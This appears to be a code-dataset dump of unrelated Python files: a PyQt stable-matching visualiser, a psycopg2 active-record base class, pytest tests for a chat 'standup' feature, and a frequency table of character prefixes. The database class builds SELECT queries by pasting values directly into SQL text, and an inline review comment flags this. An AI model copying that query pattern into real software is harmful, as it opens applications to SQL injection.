        scene.addItem(link)

    def __deleteLink(self, scene, name):
        # Remove the named link from a scene (assumes it exists).
        link = self.__findItem(name, Link, scene.items())
        scene.removeItem(link)

    def __changeText(self, scene, name, text):
        # Replace the contents of the named Text item.
        txt = self.__findItem(name, Text, scene.items())
        txt.setPlainText(text)

    def __findItem(self, name, _type, items):
        # Linear scan for an item of the given class with the given name.
        # Returns False (not None) when nothing matches.
        for item in items:
            if isinstance(item, _type) and name == item.getName():
                return item
        return False

    def __clearLinks(self, scene):
        # Remove every non-marriage link (failed/broken proposal markers).
        for item in scene.items():
            if isinstance(item,Link) and item.getType() != 'marry':
                scene.removeItem(item)

    def __clearUpLinks(self, scene):
        # Remove every link, including marriages (used for the history scene).
        for item in scene.items():
            if isinstance(item, Link):
                scene.removeItem(item)

    def __refreshViewStep(self, info):
        # Parse one step's textual report from the matching object and update
        # both scenes. Expected layout: epoch line, step line, status line,
        # then suitor/husband ranks and the outcome (Succeed / Failed /
        # "threw away" lines). Returns an early-exit code for trivial steps.
        record = info.split('\n')
        length = len(record)
        lineiter = 0
        epoch = record[lineiter].strip().split(':')[1]
        lineiter += 1
        step = record[lineiter].strip().split(':')[1]
        lineiter += 1
        statu = record[lineiter].strip()
        if 'DONE' in statu:
            return 0
        elif 'is not activity' in statu:
            return 1
        elif 'is married' in statu:
            return 2
        # Status reads like 'M<i> target W<j>' once spaces are stripped.
        couple = statu.replace(' ','').split('target')
        man = self.__findItem('M_'+couple[0], Node, self.statu_scene.items())
        woman = self.__findItem('W_'+couple[1], Node, self.statu_scene.items())
        lineiter += 1
        sui_rank = record[lineiter].replace(' ','').split(':')[1]
        lineiter += 1
        if 'Husband Rank' in record[lineiter]:
            husband_rank = record[lineiter].replace(' ','').split(':')[1]
            lineiter += 1
        if 'Succeed' in record[lineiter]:
            # Proposal accepted: draw a marriage link in both scenes and
            # refresh the spouse-rank labels of both partners.
            self.__addLink(self.statu_scene, couple[0] + '-' + couple[1], man, woman, link_type = 'marry')
            self.__addLink(self.history_scene, couple[0] + '-' + couple[1], man, woman, link_type = 'marry')
            # NOTE(review): negative ids appear to address women -- confirm
            # get_spouse_rank's id convention in the matching module.
            self.__changeText(self.statu_scene, 'M_' + couple[0] + '_S', str(self.matching.get_spouse_rank(int(couple[0]) + 1)))
            self.__changeText(self.statu_scene, 'W_' + couple[1] + '_S', str(self.matching.get_spouse_rank(-(int(couple[1]) + 1))))
            self.__changeText(self.history_scene, 'M_' + couple[0] + '_S', str(self.matching.get_spouse_rank(int(couple[0]) + 1)))
            self.__changeText(self.history_scene, 'W_' + couple[1] + '_S', str(self.matching.get_spouse_rank(-(int(couple[1]) + 1))))
        lineiter += 1
        # NOTE(review): `lineiter <= length` permits lineiter == length, which
        # would IndexError on record[lineiter]; `<` looks intended -- verify.
        if lineiter <= length:
            if 'threw away' in record[lineiter]:
                # Woman dropped a previous partner: mark the break in history
                # and remove the stale marriage from the status scene.
                throwCouple = record[lineiter].replace(' ','').split('threwaway')
                node1 = self.__findItem('M_' + throwCouple[1], Node, self.history_scene.items())
                node2 = self.__findItem('W_' + throwCouple[0], Node, self.history_scene.items())
                self.__addLink(self.history_scene, throwCouple[1] + '-' + throwCouple[0], node1, node2, (0,255,0) , 'break')
                self.__deleteLink(self.statu_scene, throwCouple[1] + '-' + throwCouple[0])
                self.__changeText(self.statu_scene, 'M_' + throwCouple[1] + '_S', '-1')
                self.__changeText(self.history_scene, 'M_' + throwCouple[1] + '_S', '-1')
                self.statu_view.update()
                self.history_view.update()
            elif 'Failed' in record[lineiter]:
                # Rejected proposal: record it in the history scene only.
                self.__addLink(self.history_scene, couple[0] + '-' + couple[1], man, woman, (0,0,255) , 'failed')
                self.statu_view.update()
                self.history_view.update()

    def nextStep(self):
        # Advance the matching by one proposal and redraw.
        info = self.matching.step()
        self.showText.setText(info)
        self.__clearLinks(self.statu_scene)
        self.__clearUpLinks(self.history_scene)
        self.__refreshViewStep(info)

    def nextEpoch(self):
        # Advance one full epoch; replay each step record against the scenes.
        info = self.matching.epoch()
        self.__clearLinks(self.statu_scene)
        self.__clearUpLinks(self.history_scene)
        # The first line of the report is reused as the per-record separator.
        sep = info.split('\n')[0]
        records = info.split(sep+'\n')
        del records[0]
        for record in records:
            self.__refreshViewStep(sep+'\n'+record)
        self.showText.setText(info)

    def exeToEnd(self):
        # Run the matching to completion; replay all 'EPOCH'-delimited records.
        info = self.matching.exe_to_end()
        self.__clearLinks(self.statu_scene)
        self.__clearUpLinks(self.history_scene)
        records = info.split('EPOCH')
        del records[0]
        for record in records:
            self.__refreshViewStep('EPOCH'+record)
        self.showText.setText(info)

    def closeEvent(self, event):
        # Confirm before letting the window close.
        reply = QtGui.QMessageBox.question(self, 'Message',
            'Are you sure to quit?', QtGui.QMessageBox.Yes, QtGui.QMessageBox.No)
        if reply == QtGui.QMessageBox.Yes:
            event.accept()
        else:
            event.ignore()
if __name__ == '__main__':
    # Standard PyQt4 bootstrap: create the application, show the window, run the loop.
    app = QtGui.QApplication(sys.argv)
    window = GUI()
    window.show()
    sys.exit(app.exec_())
|
4,336 | 2c1e51f2c392e77299463d95a2277b3d2ca7c299 | print(1/2 * 2) # division ret
|
4,337 | 8339ac512d851ea20938a1fbeedcb751cb2b8a6a | from psycopg2 import ProgrammingError, IntegrityError
import datetime
from loguru import logger
from db.connect import open_cursor, open_connection
_log_file_name = __file__.split("/")[-1].split(".")[0]
logger.add(f"logs/{_log_file_name}.log", rotation="1 day")
class DataTypeSaveError(Exception):
    """Raised when an INSERT for a data class fails at the database level."""


class TypeValidationError(Exception):
    """Raised when a field value cannot be coerced to its annotated type."""


class MultipleRowsError(Exception):
    """Raised when a single-row lookup matches more than one row."""


class DoesNotExist(Exception):
    """Raised when a lookup matches no rows."""


# Printf-style placeholder token per Python type.
type_map = {str: "%s", int: "%d", float: "%f"}
class BaseDataClass:
    """Minimal active-record base class.

    Subclasses are expected to define `_table_name`, annotated fields
    (including `id`), and `_ignore_fields`; instances can then insert
    themselves and be looked up by column values via the psycopg2
    connection helpers in db.connect.
    """
    def _create_insert_query(self):
        # Build "INSERT INTO <table> (cols) VALUES (%s, ...) RETURNING id;"
        # from the instance's public attributes; values are returned
        # separately for parameterized execution.
        column_names = ""
        row_values = ""
        values = []
        for column_name, row_value in self.__dict__.items():
            if column_name.startswith("_"):
                continue  # private attributes are not columns
            if column_name == "id" and row_value is None:
                # If id is None, leave it to the db to deal with incrementing the pk.
                continue
            column_names += str(column_name) + ", "
            row_values += "%s, "
            values.append(row_value)
        columns = "(" + column_names[:-2] + ")"        # strip trailing ", "
        values_reprs = "(" + row_values[:-2] + ")"
        query = f"INSERT INTO {self._table_name} {columns} VALUES {values_reprs} RETURNING id;"
        return query, values

    @classmethod
    def _create_select_query(cls, **kwargs):
        # Build "SELECT * FROM <table> WHERE k = 'v' AND ...;" ignoring
        # None-valued kwargs.
        # NOTE(review): values are interpolated directly into the SQL text --
        # SQL-injection risk if kwargs ever carry untrusted input; prefer
        # parameterized queries (cursor.execute(query, params)).
        key_value_pairs = ""
        for key, value in kwargs.items():
            if value is None:
                continue
            key_value_pairs += f"{key} = '{value}' AND "
        key_value_pairs = key_value_pairs[:-5]  # strip trailing " AND "
        query = f"SELECT * FROM {cls._table_name} WHERE {key_value_pairs};"
        return query

    def save(self, commit=True, with_get=True):
        """Store content to database.

        Validates field types first; when `with_get` is true, reads back the
        RETURNING id and stores it on the instance. IntegrityErrors are logged
        and swallowed; ProgrammingErrors are re-raised as DataTypeSaveError.
        This should be thread safe by using asyncio's Lock in open_cursor.
        """
        self.validate()
        logger.debug(f"Save: {self}")
        query, values = self._create_insert_query()
        with open_connection() as conn:
            with open_cursor(conn) as cursor:
                try:
                    cursor.execute(query, tuple(values))
                    if with_get:
                        _id = cursor.fetchone()[0]
                        logger.debug(f"Saved value with id: {_id}")
                        self.id = _id or self.id  # keep existing id if DB returned nothing
                        if not self.id:
                            logger.warning(f"Returned with an empty id. {self}")
                    if commit:
                        conn.commit()
                except ProgrammingError as e:
                    logger.error(e)
                    raise DataTypeSaveError
                except IntegrityError as e:
                    # e.g. unique-constraint violation: log and continue.
                    logger.warning(f"Could not save: {self}")
                    logger.error(e)
        return self

    def clean(self):
        # Hook for subclasses to normalise fields before save; base is a no-op.
        logger.debug(f"Cleaning: {self}")

    def validate(self):
        # Coerce each annotated field to its declared type, skipping a None id
        # and any names in `_ignore_fields`; raises TypeValidationError when
        # coercion fails.
        annotations = self.__annotations__
        keys_ = annotations.keys()
        fields = self.__dict__
        for key in keys_:
            if not isinstance(fields[key], annotations[key]):
                if key == "id" and fields[key] is None:
                    # Pass None to id and allow the DB to increment it.
                    continue
                if key in self._ignore_fields:
                    continue
                try:
                    self.__dict__[key] = annotations[key](fields[key])
                except (TypeError, ValueError) as e:
                    logger.error(
                        f"Encountered wrong type for {key}, got {type(fields[key])} but expected: {annotations[key]}."
                    )
                    logger.error(e)
                    raise TypeValidationError(
                        f"Encountered wrong type for {key}, got {type(fields[key])} but expected: {annotations[key]}."
                    )

    @classmethod
    def prepare(cls, *args):
        # Hook for subclasses to preprocess constructor args; base passes through.
        return args

    @classmethod
    def create(cls, with_get=False, **kwargs):
        # Construct, clean, and persist a new instance in one call.
        inst = cls(**kwargs)
        inst.clean()
        inst.save(with_get=with_get)
        return inst

    @classmethod
    def _get_rows(cls, **kwargs):
        # Execute a SELECT built from kwargs and return raw fetched rows.
        logger.debug(f"{cls}._get_rows")
        query = cls._create_select_query(**kwargs)
        with open_connection() as conn:
            with open_cursor(conn) as cursor:
                cursor.execute(query)
                rows = cursor.fetchall()
        return rows

    @classmethod
    def all(cls, **kwargs):
        # Return every matching row as an instance of cls.
        logger.debug(f"Get all: {cls}")
        rows = cls._get_rows(**kwargs)
        instances = []
        for row in rows:
            instances.append(cls(*row))
        return instances

    @classmethod
    def get(cls, **kwargs):
        # Return exactly one matching instance; raises DoesNotExist for zero
        # rows and MultipleRowsError for more than one.
        logger.debug(f"Get: {cls}")
        rows = cls._get_rows(**kwargs)
        logger.debug(f"Rows: {rows}")
        if not rows:
            # NOTE(review): message f-string is missing a closing ')'.
            raise DoesNotExist(f"{cls}({kwargs}")
        if len(rows) > 1:
            raise MultipleRowsError(f"Got {len(rows)} entries in {cls}.get()")
        if isinstance(rows, list):
            row = rows[0]
        else:
            row = rows
        return cls(*row)

    def get_id(self):
        # Look the instance up by all its fields and return the stored id.
        logger.debug(f"Get own id: {self}.")
        return self.__class__.get(**self.__dict__).id
|
4,338 | b6715ad42d59720eb021973394a0b7bfd540181b | from .standup import *
from .auth_register import *
from .channels_create import *
import pytest
# If channel does not exist
def test_notExisting_channel():
    # standup_start on a channel id that was never created must raise ValueError.
    db.reset_DB()
    auth_register('testmail@gmail.com', 'pas123456', 'Bob', 'Smith')
    realtoken = Token.generateToken('testmail@gmail.com')
    fake_channel = 70  # arbitrary id; the DB was just reset, so it cannot exist
    with pytest.raises(ValueError):
        standup_start(realtoken, fake_channel, 5)
# If channel does exist
def test_existing_channel_1():
    # A registered user starting a standup in a channel they created should succeed.
    db.reset_DB()
    auth_register('testmail@gmail.com', 'pas123456', 'Bob', 'Smith')
    realtoken = Token.generateToken('testmail@gmail.com')
    channel_id = channels_create(realtoken,'Channel', True)
    # NOTE(review): channel_id is unused -- the call below hardcodes id 1,
    # presumably the first id after reset_DB(); confirm channels_create's return shape.
    assert(standup_start(realtoken, 1, 5))
# if the user is not a member of the channel
def test_message_not_member():
    # A user who is not in the channel must get AccessError from standup_start.
    db.reset_DB()
    # NOTE(review): a token is generated for 'admin@gmail.com' without
    # registering that account first -- relies on backend behaviour; confirm.
    admintoken = Token.generateToken('admin@gmail.com')
    channel_id = channels_create(admintoken,'Channel', True)
    auth_register('testmail@gmail.com', 'pas123456', 'Bob', 'Smith')
    realtoken = Token.generateToken('testmail@gmail.com')
    with pytest.raises(AccessError):
        standup_start(realtoken, 1, 5)
# If channel does exist and user member of channel
def test_existing_channel_2():
    # Same as test_existing_channel_1: creator starts a standup in their own channel.
    db.reset_DB()
    auth_register('testmail@gmail.com', 'pas123456', 'Bob', 'Smith')
    realtoken = Token.generateToken('testmail@gmail.com')
    channel_id = channels_create(realtoken,'Channel', True)
    # NOTE(review): channel_id unused; hardcoded id 1 assumed -- see test_existing_channel_1.
    assert(standup_start(realtoken, 1, 5))
|
4,339 | f254f93193a7cb7ed2e55e4481ed85821cafcd7b | TOTAL = 1306336
ONE = {
'0': 1473,
'1': 5936,
'2': 3681,
'3': 2996,
'4': 2480,
'5': 2494,
'6': 1324,
'7': 1474,
'8': 1754,
'9': 1740,
'a': 79714,
'b': 83472,
'c': 78015,
'd': 61702,
'e': 42190,
'f': 68530,
'g': 48942,
'h': 63661,
'i': 34947,
'j': 24312,
'k': 26724,
'l': 66351,
'm': 77245,
'n': 36942,
'o': 40744,
'p': 68978,
'q': 6750,
'r': 49135,
's': 116034,
't': 87440,
'u': 19423,
'v': 22356,
'w': 50718,
'x': 6079,
'y': 13089,
'z': 7491,
}
TWO = {
'0-': 19,
'00': 145,
'01': 143,
'02': 212,
'03': 90,
'04': 61,
'05': 241,
'06': 31,
'07': 151,
'08': 104,
'09': 99,
'0a': 8,
'0b': 8,
'0c': 16,
'0d': 18,
'0e': 8,
'0f': 7,
'0g': 5,
'0h': 4,
'0i': 9,
'0j': 1,
'0k': 4,
'0l': 2,
'0m': 8,
'0n': 10,
'0o': 6,
'0p': 10,
'0r': 10,
'0s': 10,
'0t': 6,
'0u': 5,
'0v': 5,
'0w': 5,
'0x': 4,
'0y': 3,
'0z': 5,
'1-': 177,
'10': 983,
'11': 537,
'12': 767,
'13': 327,
'14': 270,
'15': 257,
'16': 276,
'17': 318,
'18': 505,
'19': 280,
'1a': 61,
'1b': 58,
'1c': 84,
'1d': 52,
'1e': 33,
'1f': 32,
'1g': 38,
'1h': 44,
'1i': 25,
'1j': 13,
'1k': 32,
'1l': 33,
'1m': 59,
'1n': 39,
'1o': 37,
'1p': 68,
'1q': 7,
'1r': 21,
'1s': 336,
'1t': 54,
'1u': 15,
'1v': 14,
'1w': 53,
'1x': 7,
'1y': 14,
'1z': 10,
'2-': 30,
'20': 889,
'21': 406,
'22': 228,
'23': 172,
'24': 480,
'25': 177,
'26': 126,
'27': 96,
'28': 108,
'29': 73,
'2a': 50,
'2b': 94,
'2c': 59,
'2d': 61,
'2e': 29,
'2f': 29,
'2g': 47,
'2h': 24,
'2i': 22,
'2j': 13,
'2k': 27,
'2l': 35,
'2m': 62,
'2n': 53,
'2o': 22,
'2p': 48,
'2q': 7,
'2r': 14,
'2s': 53,
'2t': 43,
'2u': 20,
'2v': 7,
'2w': 43,
'2x': 21,
'2y': 7,
'2z': 6,
'3-': 53,
'30': 292,
'31': 224,
'32': 188,
'33': 179,
'34': 91,
'35': 153,
'36': 367,
'37': 101,
'38': 122,
'39': 118,
'3a': 50,
'3b': 45,
'3c': 37,
'3d': 350,
'3e': 17,
'3f': 26,
'3g': 125,
'3h': 27,
'3i': 11,
'3j': 9,
'3k': 19,
'3l': 25,
'3m': 45,
'3n': 17,
'3o': 15,
'3p': 32,
'3q': 12,
'3r': 72,
'3s': 53,
'3t': 28,
'3u': 3,
'3v': 13,
'3w': 36,
'3x': 17,
'3y': 14,
'3z': 10,
'4-': 76,
'40': 357,
'41': 259,
'42': 170,
'43': 88,
'44': 126,
'45': 102,
'46': 67,
'47': 56,
'48': 97,
'49': 62,
'4a': 41,
'4b': 49,
'4c': 55,
'4d': 53,
'4e': 51,
'4f': 43,
'4g': 52,
'4h': 44,
'4i': 19,
'4j': 13,
'4k': 22,
'4l': 48,
'4m': 62,
'4n': 22,
'4o': 21,
'4p': 60,
'4q': 11,
'4r': 26,
'4s': 94,
'4t': 44,
'4u': 40,
'4v': 17,
'4w': 45,
'4x': 58,
'4y': 24,
'4z': 6,
'5-': 30,
'50': 323,
'51': 574,
'52': 361,
'53': 79,
'54': 155,
'55': 141,
'56': 109,
'57': 66,
'58': 85,
'59': 87,
'5a': 32,
'5b': 17,
'5c': 21,
'5d': 39,
'5e': 7,
'5f': 17,
'5g': 21,
'5h': 10,
'5i': 54,
'5j': 4,
'5k': 16,
'5l': 19,
'5m': 22,
'5n': 8,
'5o': 12,
'5p': 27,
'5q': 4,
'5r': 9,
'5s': 55,
'5t': 38,
'5u': 17,
'5v': 5,
'5w': 5,
'5x': 9,
'5y': 10,
'5z': 6,
'6-': 42,
'60': 173,
'61': 182,
'62': 63,
'63': 56,
'64': 51,
'65': 125,
'66': 134,
'67': 62,
'68': 58,
'69': 105,
'6a': 12,
'6b': 7,
'6c': 11,
'6d': 61,
'6e': 6,
'6f': 15,
'6g': 7,
'6h': 11,
'6i': 6,
'6j': 1,
'6k': 7,
'6l': 8,
'6m': 16,
'6n': 1,
'6o': 5,
'6p': 12,
'6q': 6,
'6r': 15,
'6s': 28,
'6t': 12,
'6u': 2,
'6v': 2,
'6w': 8,
'6x': 5,
'6y': 9,
'7-': 34,
'70': 200,
'71': 205,
'72': 81,
'73': 58,
'74': 53,
'75': 59,
'76': 69,
'77': 191,
'78': 92,
'79': 48,
'7a': 33,
'7b': 18,
'7c': 28,
'7d': 31,
'7e': 13,
'7f': 15,
'7g': 11,
'7h': 15,
'7i': 7,
'7j': 8,
'7k': 16,
'7l': 19,
'7m': 15,
'7n': 5,
'7o': 13,
'7p': 10,
'7q': 2,
'7r': 4,
'7s': 33,
'7t': 37,
'7u': 2,
'7v': 3,
'7w': 13,
'7x': 13,
'7y': 12,
'7z': 8,
'8-': 61,
'80': 336,
'81': 180,
'82': 61,
'83': 62,
'84': 99,
'85': 85,
'86': 138,
'87': 85,
'88': 339,
'89': 78,
'8a': 11,
'8b': 16,
'8c': 9,
'8d': 10,
'8e': 6,
'8f': 10,
'8g': 18,
'8h': 7,
'8i': 12,
'8j': 4,
'8k': 6,
'8l': 6,
'8m': 11,
'8n': 2,
'8o': 8,
'8p': 15,
'8q': 7,
'8r': 10,
'8s': 18,
'8t': 24,
'8u': 3,
'8v': 2,
'8w': 4,
'8x': 1,
'8y': 6,
'8z': 4,
'9-': 45,
'90': 173,
'91': 275,
'92': 149,
'93': 59,
'94': 76,
'95': 82,
'96': 76,
'97': 123,
'98': 74,
'99': 270,
'9a': 19,
'9b': 9,
'9c': 22,
'9d': 17,
'9e': 10,
'9f': 5,
'9g': 16,
'9h': 6,
'9i': 20,
'9j': 10,
'9k': 9,
'9l': 13,
'9m': 19,
'9n': 8,
'9o': 8,
'9p': 29,
'9q': 3,
'9r': 11,
'9s': 22,
'9t': 26,
'9u': 3,
'9v': 8,
'9w': 11,
'9x': 21,
'9y': 8,
'9z': 5,
'a-': 307,
'a0': 6,
'a1': 172,
'a2': 58,
'a3': 25,
'a4': 16,
'a5': 9,
'a6': 8,
'a7': 20,
'a8': 12,
'a9': 15,
'aa': 778,
'ab': 3124,
'ac': 4416,
'ad': 5316,
'ae': 537,
'af': 1343,
'ag': 4563,
'ah': 760,
'ai': 5617,
'aj': 331,
'ak': 715,
'al': 9102,
'am': 4388,
'an': 8462,
'ao': 351,
'ap': 2155,
'aq': 426,
'ar': 9178,
'as': 6419,
'at': 4007,
'au': 2485,
'av': 1218,
'aw': 1869,
'ax': 403,
'ay': 457,
'az': 646,
'b-': 148,
'b0': 7,
'b1': 19,
'b2': 94,
'b3': 12,
'b4': 24,
'b5': 9,
'b6': 4,
'b7': 5,
'b8': 2,
'b9': 6,
'ba': 15356,
'bb': 477,
'bc': 323,
'bd': 266,
'be': 14064,
'bf': 200,
'bg': 189,
'bh': 311,
'bi': 11911,
'bj': 604,
'bk': 178,
'bl': 5297,
'bm': 306,
'bn': 218,
'bo': 11986,
'bp': 229,
'bq': 103,
'br': 5001,
'bs': 317,
'bt': 266,
'bu': 12643,
'bv': 126,
'bw': 147,
'bx': 91,
'by': 2394,
'bz': 139,
'c-': 120,
'c0': 13,
'c1': 21,
'c2': 78,
'c3': 34,
'c4': 30,
'c5': 6,
'c6': 4,
'c7': 10,
'c8': 4,
'c9': 8,
'ca': 18400,
'cb': 368,
'cc': 678,
'cd': 484,
'ce': 3579,
'cf': 300,
'cg': 253,
'ch': 11318,
'ci': 2463,
'cj': 218,
'ck': 165,
'cl': 5881,
'cm': 371,
'cn': 895,
'co': 15790,
'cp': 497,
'cq': 239,
'cr': 5502,
'cs': 1710,
'ct': 364,
'cu': 6370,
'cv': 200,
'cw': 201,
'cx': 142,
'cy': 1053,
'cz': 246,
'd-': 147,
'd0': 7,
'd1': 14,
'd2': 37,
'd3': 29,
'd4': 10,
'd5': 5,
'd6': 4,
'd7': 8,
'd8': 6,
'd9': 7,
'da': 9910,
'db': 288,
'dc': 410,
'dd': 303,
'de': 11362,
'df': 288,
'dg': 307,
'dh': 280,
'di': 10934,
'dj': 682,
'dk': 157,
'dl': 393,
'dm': 361,
'dn': 476,
'do': 10944,
'dp': 211,
'dq': 106,
'dr': 6965,
'ds': 393,
'dt': 262,
'du': 4853,
'dv': 376,
'dw': 211,
'dx': 157,
'dy': 630,
'dz': 169,
'e-': 1066,
'e0': 9,
'e1': 12,
'e2': 26,
'e3': 27,
'e4': 11,
'e5': 2,
'e6': 6,
'e7': 6,
'e8': 37,
'e9': 5,
'ea': 6784,
'eb': 771,
'ec': 1530,
'ed': 2674,
'ee': 257,
'ef': 482,
'eg': 508,
'eh': 276,
'ei': 552,
'ej': 151,
'ek': 329,
'el': 3657,
'em': 1785,
'en': 4879,
'eo': 205,
'ep': 613,
'eq': 553,
'er': 2767,
'es': 1797,
'et': 766,
'eu': 1095,
'ev': 2975,
'ew': 218,
'ex': 2521,
'ey': 2066,
'ez': 772,
'f-': 75,
'f0': 6,
'f1': 54,
'f2': 25,
'f3': 5,
'f4': 9,
'f5': 12,
'f6': 2,
'f7': 4,
'f8': 10,
'f9': 2,
'fa': 12917,
'fb': 165,
'fc': 272,
'fd': 154,
'fe': 8514,
'ff': 195,
'fg': 107,
'fh': 175,
'fi': 14464,
'fj': 192,
'fk': 90,
'fl': 7482,
'fm': 210,
'fn': 114,
'fo': 8864,
'fp': 132,
'fq': 77,
'fr': 7566,
'fs': 413,
'ft': 252,
'fu': 5259,
'fv': 88,
'fw': 129,
'fx': 197,
'fy': 155,
'fz': 143,
'g-': 138,
'g0': 21,
'g1': 38,
'g2': 26,
'g3': 34,
'g4': 26,
'g5': 11,
'g6': 5,
'g7': 5,
'g8': 15,
'g9': 5,
'ga': 8708,
'gb': 232,
'gc': 262,
'gd': 339,
'ge': 5489,
'gf': 176,
'gg': 245,
'gh': 399,
'gi': 3752,
'gj': 108,
'gk': 138,
'gl': 2606,
'gm': 387,
'gn': 217,
'go': 9782,
'gp': 455,
'gq': 78,
'gr': 8101,
'gs': 381,
'gt': 252,
'gu': 5335,
'gv': 138,
'gw': 202,
'gx': 176,
'gy': 265,
'gz': 395,
'h-': 120,
'h0': 6,
'h1': 14,
'h2': 149,
'h3': 15,
'h4': 28,
'h5': 6,
'h6': 3,
'h7': 2,
'h8': 8,
'h9': 2,
'ha': 16216,
'hb': 351,
'hc': 228,
'hd': 442,
'he': 12087,
'hf': 180,
'hg': 158,
'hh': 243,
'hi': 10582,
'hj': 147,
'hk': 331,
'hl': 215,
'hm': 214,
'hn': 317,
'ho': 14380,
'hp': 207,
'hq': 147,
'hr': 318,
'hs': 380,
'ht': 314,
'hu': 4226,
'hv': 119,
'hw': 147,
'hx': 150,
'hy': 943,
'hz': 266,
'i-': 527,
'i0': 9,
'i1': 8,
'i2': 34,
'i3': 14,
'i4': 17,
'i5': 4,
'i6': 6,
'i7': 12,
'i8': 8,
'i9': 11,
'ia': 606,
'ib': 659,
'ic': 2175,
'id': 1981,
'ie': 282,
'if': 1514,
'ig': 488,
'ih': 370,
'ii': 226,
'ij': 122,
'ik': 351,
'il': 2287,
'im': 2155,
'in': 10117,
'io': 344,
'ip': 818,
'iq': 154,
'ir': 1037,
'is': 2803,
'it': 4514,
'iu': 135,
'iv': 328,
'iw': 391,
'ix': 87,
'iy': 123,
'iz': 230,
'j-': 143,
'j0': 7,
'j1': 2,
'j2': 20,
'j3': 8,
'j4': 10,
'j5': 1,
'j6': 1,
'j7': 2,
'j8': 3,
'j9': 2,
'ja': 3167,
'jb': 251,
'jc': 336,
'jd': 290,
'je': 2239,
'jf': 152,
'jg': 136,
'jh': 228,
'ji': 1541,
'jj': 266,
'jk': 191,
'jl': 249,
'jm': 340,
'jn': 230,
'jo': 7930,
'jp': 278,
'jq': 82,
'jr': 261,
'js': 448,
'jt': 174,
'ju': 4460,
'jv': 125,
'jw': 191,
'jx': 200,
'jy': 202,
'jz': 146,
'k-': 110,
'k0': 7,
'k1': 29,
'k2': 30,
'k3': 14,
'k4': 5,
'k5': 7,
'k6': 5,
'k7': 7,
'k8': 4,
'k9': 32,
'ka': 3724,
'kb': 212,
'kc': 275,
'kd': 182,
'ke': 6054,
'kf': 130,
'kg': 137,
'kh': 420,
'ki': 6316,
'kj': 144,
'kk': 167,
'kl': 487,
'km': 248,
'kn': 2612,
'ko': 1868,
'kp': 181,
'kq': 59,
'kr': 785,
'ks': 300,
'kt': 192,
'ku': 1013,
'kv': 116,
'kw': 230,
'kx': 88,
'ky': 444,
'kz': 90,
'l-': 45,
'l0': 12,
'l1': 8,
'l2': 60,
'l3': 18,
'l4': 6,
'l5': 2,
'l6': 2,
'l7': 14,
'l8': 5,
'l9': 3,
'la': 14155,
'lb': 350,
'lc': 258,
'ld': 192,
'le': 13390,
'lf': 172,
'lg': 196,
'lh': 179,
'li': 13775,
'lj': 185,
'lk': 82,
'll': 276,
'lm': 185,
'ln': 163,
'lo': 17441,
'lp': 192,
'lq': 75,
'lr': 137,
'ls': 265,
'lt': 197,
'lu': 2947,
'lv': 210,
'lw': 133,
'lx': 124,
'ly': 761,
'lz': 136,
'm-': 162,
'm0': 11,
'm1': 26,
'm2': 47,
'm3': 32,
'm4': 31,
'm5': 8,
'm6': 7,
'm7': 6,
'm8': 11,
'm9': 4,
'ma': 21517,
'mb': 321,
'mc': 856,
'md': 322,
'me': 12983,
'mf': 160,
'mg': 199,
'mh': 180,
'mi': 10847,
'mj': 190,
'mk': 192,
'ml': 403,
'mm': 572,
'mn': 242,
'mo': 11994,
'mp': 473,
'mq': 80,
'mr': 773,
'ms': 631,
'mt': 424,
'mu': 3947,
'mv': 212,
'mw': 145,
'mx': 138,
'my': 8975,
'mz': 124,
'n-': 85,
'n0': 16,
'n1': 16,
'n2': 209,
'n3': 6,
'n4': 10,
'n5': 3,
'n6': 4,
'n7': 6,
'n8': 14,
'n9': 2,
'na': 5028,
'nb': 379,
'nc': 347,
'nd': 186,
'ne': 10656,
'nf': 213,
'ng': 232,
'nh': 270,
'ni': 3672,
'nj': 370,
'nk': 136,
'nl': 174,
'nm': 214,
'nn': 176,
'no': 10377,
'np': 174,
'nq': 65,
'nr': 161,
'ns': 248,
'nt': 270,
'nu': 1902,
'nv': 175,
'nw': 247,
'nx': 119,
'ny': 630,
'nz': 150,
'o-': 95,
'o0': 2,
'o1': 5,
'o2': 28,
'o3': 13,
'o4': 2,
'o5': 5,
'o6': 2,
'o7': 2,
'o8': 4,
'o9': 1,
'oa': 322,
'ob': 1267,
'oc': 959,
'od': 2152,
'oe': 162,
'of': 3428,
'og': 208,
'oh': 1587,
'oi': 1494,
'oj': 147,
'ok': 724,
'ol': 2309,
'om': 1532,
'on': 7256,
'oo': 234,
'op': 1673,
'oq': 58,
'or': 3282,
'os': 555,
'ot': 634,
'ou': 4435,
'ov': 944,
'ow': 4377,
'ox': 218,
'oy': 187,
'oz': 441,
'p-': 86,
'p0': 12,
'p1': 19,
'p2': 43,
'p3': 24,
'p4': 15,
'p5': 8,
'p6': 2,
'p7': 2,
'p8': 5,
'p9': 5,
'pa': 15758,
'pb': 196,
'pc': 606,
'pd': 263,
'pe': 6763,
'pf': 189,
'pg': 207,
'ph': 2496,
'pi': 7203,
'pj': 148,
'pk': 162,
'pl': 7080,
'pm': 258,
'pn': 171,
'po': 11038,
'pp': 369,
'pq': 91,
'pr': 7474,
'ps': 686,
'pt': 286,
'pu': 6557,
'pv': 156,
'pw': 142,
'px': 98,
'py': 246,
'pz': 114,
'q-': 38,
'q0': 3,
'q1': 8,
'q2': 8,
'q3': 6,
'q4': 4,
'q5': 3,
'q6': 3,
'q8': 44,
'q9': 4,
'qa': 220,
'qb': 92,
'qc': 118,
'qd': 194,
'qe': 117,
'qf': 81,
'qg': 84,
'qh': 109,
'qi': 391,
'qj': 79,
'qk': 73,
'ql': 125,
'qm': 82,
'qn': 92,
'qo': 114,
'qp': 102,
'qq': 248,
'qr': 83,
'qs': 131,
'qt': 89,
'qu': 3434,
'qv': 65,
'qw': 148,
'qx': 97,
'qy': 109,
'qz': 152,
'r-': 89,
'r0': 7,
'r1': 10,
'r2': 26,
'r3': 20,
'r4': 17,
'r5': 2,
'r6': 2,
'r7': 10,
'r8': 1,
'r9': 4,
'ra': 9842,
'rb': 211,
'rc': 334,
'rd': 204,
're': 13653,
'rf': 215,
'rg': 139,
'rh': 365,
'ri': 7079,
'rj': 156,
'rk': 119,
'rl': 150,
'rm': 254,
'rn': 173,
'ro': 9275,
'rp': 216,
'rq': 46,
'rr': 143,
'rs': 333,
'rt': 270,
'ru': 4797,
'rv': 182,
'rw': 142,
'rx': 199,
'ry': 348,
'rz': 102,
's-': 122,
's0': 6,
's1': 26,
's2': 33,
's3': 27,
's4': 19,
's5': 10,
's6': 12,
's7': 19,
's8': 12,
's9': 6,
'sa': 17038,
'sb': 328,
'sc': 3980,
'sd': 603,
'se': 18133,
'sf': 356,
'sg': 309,
'sh': 12388,
'si': 10761,
'sj': 286,
'sk': 1551,
'sl': 2639,
